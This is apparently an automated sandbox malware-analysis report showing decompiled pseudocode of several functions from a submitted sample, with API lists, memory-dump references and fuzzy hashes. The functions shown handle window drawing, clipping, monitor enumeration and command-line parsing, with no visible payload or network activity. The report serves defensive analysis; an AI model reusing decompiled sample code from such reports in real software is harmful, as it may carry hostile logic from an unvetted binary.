                                                    • 733AA7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A85E
                                                    • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A86C
                                                    • 733AB410.GDI32(?,00000000,000000FF,0042A8BE,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042A89E
                                                    • SelectObject.GDI32(?,?), ref: 0042A8AB
                                                    • DeleteObject.GDI32(00000000), ref: 0042A8B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                                    • String ID: ($BM
                                                    • API String ID: 3415089252-2980357723
                                                    • Opcode ID: 496f69271fb9ccee439b3da71489c37b304fc4bf0672b7fc97fcd75c0970043d
                                                    • Instruction ID: 25b6b903fc63a4d1ab3304e11741f41bc99333438c5c48279b365a0d6610163c
                                                    • Opcode Fuzzy Hash: 496f69271fb9ccee439b3da71489c37b304fc4bf0672b7fc97fcd75c0970043d
                                                    • Instruction Fuzzy Hash: A8D14C74F002189FDB04EFA9D885BAEBBB5FF48304F54846AE904E7391D7389851CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00426070 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 51%
                                                    			E00426070(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L004072E0();
				_v28 = __eax;
				_push(0);
				L004072E0();
				_v32 = __eax;
				_push(_t87);
				_push(0x4261be);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L00407638();
					_v24 = _t37;
					if(_v24 == 0) {
						E00425FB8(__ecx);
					}
					_push(_t87);
					_push(0x42612d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L004072D8();
					_v20 = _t41;
					if(_v20 == 0) {
						E00425FB8(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x426134);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L00407888();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L004072C8();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(0x4261c5);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}
























                                                    0x00426071
                                                    0x00426073
                                                    0x0042607e
                                                    0x0042607f
                                                    0x00426080
                                                    0x00426082
                                                    0x00426085
                                                    0x00426087
                                                    0x0042608c
                                                    0x0042608f
                                                    0x00426091
                                                    0x00426096
                                                    0x0042609b
                                                    0x0042609c
                                                    0x004260a1
                                                    0x004260a4
                                                    0x004260b1
                                                    0x004260b8
                                                    0x004260d2
                                                    0x004260d4
                                                    0x004260d9
                                                    0x004260e0
                                                    0x004260e2
                                                    0x004260e2
                                                    0x004260e9
                                                    0x004260ea
                                                    0x004260ef
                                                    0x004260f2
                                                    0x004260f8
                                                    0x004260fc
                                                    0x004260fd
                                                    0x00426100
                                                    0x00426101
                                                    0x00426106
                                                    0x0042610d
                                                    0x0042610f
                                                    0x0042610f
                                                    0x00426116
                                                    0x00426119
                                                    0x0042611c
                                                    0x00426121
                                                    0x00426124
                                                    0x00426125
                                                    0x00426127
                                                    0x0042612c
                                                    0x004260ba
                                                    0x004260ba
                                                    0x004260bc
                                                    0x004260be
                                                    0x004260c3
                                                    0x004260c4
                                                    0x004260c7
                                                    0x004260c8
                                                    0x004260cd
                                                    0x00426138
                                                    0x00426147
                                                    0x00426156
                                                    0x0042617d
                                                    0x00426184
                                                    0x0042618b
                                                    0x0042618b
                                                    0x00426192
                                                    0x00426199
                                                    0x00426199
                                                    0x00426192
                                                    0x004261a0
                                                    0x004261a3
                                                    0x004261a6
                                                    0x004261af
                                                    0x004261bd
                                                    0x004261bd

                                                    APIs
                                                    • 733AA590.GDI32(00000000), ref: 00426087
                                                    • 733AA590.GDI32(00000000,00000000), ref: 00426091
                                                    • GetObjectA.GDI32(?,00000018,?), ref: 004260B1
                                                    • 733AA410.GDI32(?,?,00000001,00000001,00000000,00000000,004261BE,?,00000000,00000000), ref: 004260C8
                                                    • 733AAC50.USER32(00000000,00000000,004261BE,?,00000000,00000000), ref: 004260D4
                                                    • 733AA520.GDI32(00000000,?,?,00000000,0042612D,?,00000000,00000000,004261BE,?,00000000,00000000), ref: 00426101
                                                    • 733AB380.USER32(00000000,00000000,00426134,00000000,0042612D,?,00000000,00000000,004261BE,?,00000000,00000000), ref: 00426127
                                                    • SelectObject.GDI32(?,?), ref: 00426142
                                                    • SelectObject.GDI32(?,00000000), ref: 00426151
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0042617D
                                                    • SelectObject.GDI32(?,00000000), ref: 0042618B
                                                    • SelectObject.GDI32(?,00000000), ref: 00426199
                                                    • DeleteDC.GDI32(?), ref: 004261AF
                                                    • DeleteDC.GDI32(?), ref: 004261B8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                                    • String ID:
                                                    • API String ID: 956127455-0
                                                    • Opcode ID: 96549eea74ed33ff1694cbe071ccede941aae8e18c591fd20771ef1c91b8bae9
                                                    • Instruction ID: 23bfd75d1e5f7ab71a99e75aee45f16e7152ef54e2d5d773258edcec8bfffe0d
                                                    • Opcode Fuzzy Hash: 96549eea74ed33ff1694cbe071ccede941aae8e18c591fd20771ef1c91b8bae9
                                                    • Instruction Fuzzy Hash: 9D411271E04219AFDB10DBE9DC42FAFB7BCEB08704F91446AB604F7281C67869108769
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004424F8 Relevance: 19.7, APIs: 13, Instructions: 224COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 55%
                                                    			E004424F8(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t120;
				void* _t171;
				intOrPtr* _t193;
				intOrPtr* _t196;
				intOrPtr _t205;
				void* _t208;
				intOrPtr _t216;
				signed int _t234;
				void* _t237;
				void* _t239;
				intOrPtr _t240;

				_t237 = _t239;
				_t240 = _t239 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_t120 = E00441704(_v8);
					_push(_t120);
					L00407730();
					_v16 = _t120;
					_push(_t237);
					_push(0x44275e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t240;
					GetClientRect(E00441704(_v8),  &_v32);
					GetWindowRect(E00441704(_v8),  &_v48);
					MapWindowPoints(0, E00441704(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t208 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t234 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t208;
						}
						if((_t234 & 0x00200000) != 0) {
							_t196 =  *0x49d970; // 0x49e900
							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t208;
						}
						if((_t234 & 0x00100000) != 0) {
							_t193 =  *0x49d970; // 0x49e900
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x49bcec + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x49bcfc + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x49bd0c + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x49bd1c + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E00425610( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t216);
					 *[fs:eax] = _t216;
					_push(0x442765);
					_push(_v16);
					_t171 = E00441704(_v8);
					_push(_t171);
					L00407888();
					return _t171;
				} else {
					 *((intOrPtr*)( *_v8 - 0x10))();
					_t205 = E004329D8(E004328F8());
					if(_t205 != 0) {
						_t205 = _v8;
						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
							_t205 = E00432F08(E004328F8(), 0, _v8);
						}
					}
					return _t205;
				}
			}




















                                                    0x004424f9
                                                    0x004424fb
                                                    0x00442501
                                                    0x00442504
                                                    0x00442511
                                                    0x00442526
                                                    0x0044252b
                                                    0x0044252c
                                                    0x00442531
                                                    0x00442536
                                                    0x00442537
                                                    0x0044253c
                                                    0x0044253f
                                                    0x0044254f
                                                    0x00442561
                                                    0x00442577
                                                    0x0044258c
                                                    0x004425a5
                                                    0x004425b0
                                                    0x004425b1
                                                    0x004425b2
                                                    0x004425b3
                                                    0x004425c3
                                                    0x004425ce
                                                    0x004425cf
                                                    0x004425d0
                                                    0x004425d1
                                                    0x004425dc
                                                    0x004425e2
                                                    0x004425ee
                                                    0x004425f3
                                                    0x004425f3
                                                    0x00442603
                                                    0x00442608
                                                    0x00442608
                                                    0x0044261e
                                                    0x0044262a
                                                    0x0044262c
                                                    0x0044262c
                                                    0x00442639
                                                    0x0044263b
                                                    0x0044263b
                                                    0x00442648
                                                    0x0044264a
                                                    0x0044264a
                                                    0x00442653
                                                    0x00442657
                                                    0x00442660
                                                    0x00442660
                                                    0x0044266d
                                                    0x0044266f
                                                    0x0044266f
                                                    0x00442678
                                                    0x0044267c
                                                    0x00442685
                                                    0x00442685
                                                    0x004426e5
                                                    0x004426e5
                                                    0x004426fe
                                                    0x00442709
                                                    0x0044270a
                                                    0x0044270b
                                                    0x0044270c
                                                    0x0044271d
                                                    0x00442739
                                                    0x00442740
                                                    0x00442743
                                                    0x00442746
                                                    0x0044274e
                                                    0x00442752
                                                    0x00442757
                                                    0x00442758
                                                    0x0044275d
                                                    0x00442765
                                                    0x0044276d
                                                    0x00442775
                                                    0x0044277c
                                                    0x0044277e
                                                    0x00442785
                                                    0x00442791
                                                    0x00442791
                                                    0x00442785
                                                    0x0044279c
                                                    0x0044279c

                                                    APIs
                                                    • 733AB080.USER32(00000000), ref: 0044252C
                                                    • GetClientRect.USER32 ref: 0044254F
                                                    • GetWindowRect.USER32 ref: 00442561
                                                    • MapWindowPoints.USER32 ref: 00442577
                                                    • OffsetRect.USER32(?,?,?), ref: 0044258C
                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 004425A5
                                                    • InflateRect.USER32(?,00000000,00000000), ref: 004425C3
                                                    • GetWindowLongA.USER32 ref: 00442619
                                                    • DrawEdge.USER32(?,?,00000000,00000008), ref: 004426E5
                                                    • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004426FE
                                                    • OffsetRect.USER32(?,?,?), ref: 0044271D
                                                    • FillRect.USER32 ref: 00442739
                                                    • 733AB380.USER32(00000000,?,00442765,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00442758
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                                    • String ID:
                                                    • API String ID: 156109915-0
                                                    • Opcode ID: c56058a07da977805be350d555e5f4c2bc4b18feb5411abbc630dda1f5db6ba1
                                                    • Instruction ID: af5f50b217af5c554848a1b825971ec4031c124bbe34cabe8649f27ab7cee0d4
                                                    • Opcode Fuzzy Hash: c56058a07da977805be350d555e5f4c2bc4b18feb5411abbc630dda1f5db6ba1
                                                    • Instruction Fuzzy Hash: 48911771E04208AFDB01DBA9C985EEEB7F9AF09314F5440A6F504F7252C779AE40DB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00432F08 Relevance: 18.1, APIs: 12, Instructions: 142COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 57%
                                                    			E00432F08(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				struct HDC__* _t55;
				void* _t74;
				signed int _t77;
				int _t79;
				void* _t92;
				intOrPtr _t105;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t122;
				intOrPtr _t123;

				_t120 = _t122;
				_t123 = _t122 + 0xffffffbc;
				_t92 = __ecx;
				_v8 = __edx;
				_t114 = __eax;
				_t43 = GetWindowLongA(E00441704(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E00441704(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_t55 = E00441704(_v8);
					_push(_t55);
					L00407730();
					_v12 = _t55;
					_push(_t120);
					_push(0x433063);
					_push( *[fs:edx]);
					 *[fs:edx] = _t123;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t117 = _t114;
					if(_t92 != 0) {
						_t77 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
							GetSystemMetrics(2);
							_t79 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							E00419804(_v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t117 = _t117;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E00432B40( &_v56, 2);
					E00432A94(_t117,  &_v56, _v12, 0,  &_v44);
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x43306a);
					_push(_v12);
					_t74 = E00441704(_v8);
					_push(_t74);
					L00407888();
					return _t74;
				}
			}





















                                                    0x00432f09
                                                    0x00432f0b
                                                    0x00432f11
                                                    0x00432f13
                                                    0x00432f16
                                                    0x00432f23
                                                    0x00432f2b
                                                    0x00433070
                                                    0x00432f31
                                                    0x00432f3e
                                                    0x00432f53
                                                    0x00432f5b
                                                    0x00432f60
                                                    0x00432f61
                                                    0x00432f66
                                                    0x00432f6b
                                                    0x00432f6c
                                                    0x00432f71
                                                    0x00432f74
                                                    0x00432f7e
                                                    0x00432f7f
                                                    0x00432f80
                                                    0x00432f81
                                                    0x00432f82
                                                    0x00432f85
                                                    0x00432f92
                                                    0x00432f9c
                                                    0x00432fa7
                                                    0x00432fb0
                                                    0x00432fbf
                                                    0x00432fd9
                                                    0x00432fe5
                                                    0x00432fe6
                                                    0x00432fe7
                                                    0x00432fe8
                                                    0x00432fe9
                                                    0x00432ffa
                                                    0x00432ffa
                                                    0x00432f9c
                                                    0x0043301f
                                                    0x0043302b
                                                    0x0043303e
                                                    0x00433045
                                                    0x00433048
                                                    0x0043304b
                                                    0x00433053
                                                    0x00433057
                                                    0x0043305c
                                                    0x0043305d
                                                    0x00433062
                                                    0x00433062

                                                    APIs
                                                    • GetWindowLongA.USER32 ref: 00432F23
                                                    • GetWindowRect.USER32 ref: 00432F3E
                                                    • OffsetRect.USER32(?,?,?), ref: 00432F53
                                                    • 733AB080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00432F61
                                                    • GetWindowLongA.USER32 ref: 00432F92
                                                    • GetSystemMetrics.USER32 ref: 00432FA7
                                                    • GetSystemMetrics.USER32 ref: 00432FB0
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00432FBF
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00432FEC
                                                    • FillRect.USER32 ref: 00432FFA
                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043301F
                                                    • 733AB380.USER32(00000000,?,0043306A,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043305D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                                                    • String ID:
                                                    • API String ID: 3936689491-0
                                                    • Opcode ID: 1044420493868e0b4b43c14135ea523b993d5beeeaccf79545e6cca688bac7b0
                                                    • Instruction ID: 04c1fd49532e7d442bf35e743343acee4fdea8649fd85b2f3a22c1a56fe95c6f
                                                    • Opcode Fuzzy Hash: 1044420493868e0b4b43c14135ea523b993d5beeeaccf79545e6cca688bac7b0
                                                    • Instruction Fuzzy Hash: A9415E71E04108ABDB01EAE9CD82EDFB7BDEF49364F100126F904F7291CA78AE418765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042CAA8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E0042CAA8(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x49e92f != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x49e91c = E0042C4FC(7, _t60,  *0x49e91c, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                                                    0x0042cab1
                                                    0x0042cab4
                                                    0x0042cabe
                                                    0x0042caee
                                                    0x0042caf4
                                                    0x0042cbb0
                                                    0x0042cbb8
                                                    0x0042cbb8
                                                    0x0042cafc
                                                    0x0042cb01
                                                    0x0042cb0c
                                                    0x0042cb17
                                                    0x0042cb1c
                                                    0x0042cb85
                                                    0x0042cb9d
                                                    0x0042cbae
                                                    0x0042cb99
                                                    0x0042cb99
                                                    0x0042cb99
                                                    0x00000000
                                                    0x0042cb85
                                                    0x0042cb28
                                                    0x0042cb37
                                                    0x00000000
                                                    0x00000000
                                                    0x0042cb49
                                                    0x0042cb61
                                                    0x0042cb77
                                                    0x00000000
                                                    0x00000000
                                                    0x0042cb7d
                                                    0x0042cb7f
                                                    0x0042cb7f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0042cb61
                                                    0x0042cad2
                                                    0x0042cae7
                                                    0x00000000

                                                    APIs
                                                    • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042CAE1
                                                    • GetSystemMetrics.USER32 ref: 0042CB06
                                                    • GetSystemMetrics.USER32 ref: 0042CB11
                                                    • GetClipBox.GDI32(?,?), ref: 0042CB23
                                                    • GetDCOrgEx.GDI32(?,?), ref: 0042CB30
                                                    • OffsetRect.USER32(?,?,?), ref: 0042CB49
                                                    • IntersectRect.USER32 ref: 0042CB5A
                                                    • IntersectRect.USER32 ref: 0042CB70
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                    • String ID: EnumDisplayMonitors
                                                    • API String ID: 362875416-2491903729
                                                    • Opcode ID: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                    • Instruction ID: 4511490224432de624573bc09b14fa9d255139f998f9dfe8687c617b2a51fe57
                                                    • Opcode Fuzzy Hash: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                    • Instruction Fuzzy Hash: 723101B2E04219AFDB50DFA5E885EFF77BCAB05300F444537ED15E3241D638AA018BA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402A1C Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00402A1C(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E0040500C(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















                                                    0x00402a20
                                                    0x00402a22
                                                    0x00402a2e
                                                    0x00402a2e
                                                    0x00402a2e
                                                    0x00402a32
                                                    0x00402a2c
                                                    0x00402a2c
                                                    0x00402a2e
                                                    0x00402a2e
                                                    0x00402a32
                                                    0x00402a2c
                                                    0x00402a2c
                                                    0x00402a38
                                                    0x00402a3b
                                                    0x00402a48
                                                    0x00402a4a
                                                    0x00402a91
                                                    0x00402a91
                                                    0x00402a95
                                                    0x00000000
                                                    0x00000000
                                                    0x00402a50
                                                    0x00402a84
                                                    0x00402a8d
                                                    0x00402a8f
                                                    0x00000000
                                                    0x00402a8f
                                                    0x00402a58
                                                    0x00402a6a
                                                    0x00402a6a
                                                    0x00402a6e
                                                    0x00000000
                                                    0x00000000
                                                    0x00402a5d
                                                    0x00402a66
                                                    0x00402a68
                                                    0x00402a68
                                                    0x00402a77
                                                    0x00402a7f
                                                    0x00402a7f
                                                    0x00402a77
                                                    0x00402a9b
                                                    0x00402aa0
                                                    0x00402aa2
                                                    0x00402aa4
                                                    0x00402af9
                                                    0x00402af9
                                                    0x00402afd
                                                    0x00000000
                                                    0x00000000
                                                    0x00402aaa
                                                    0x00402ae5
                                                    0x00402aec
                                                    0x00000000
                                                    0x00000000
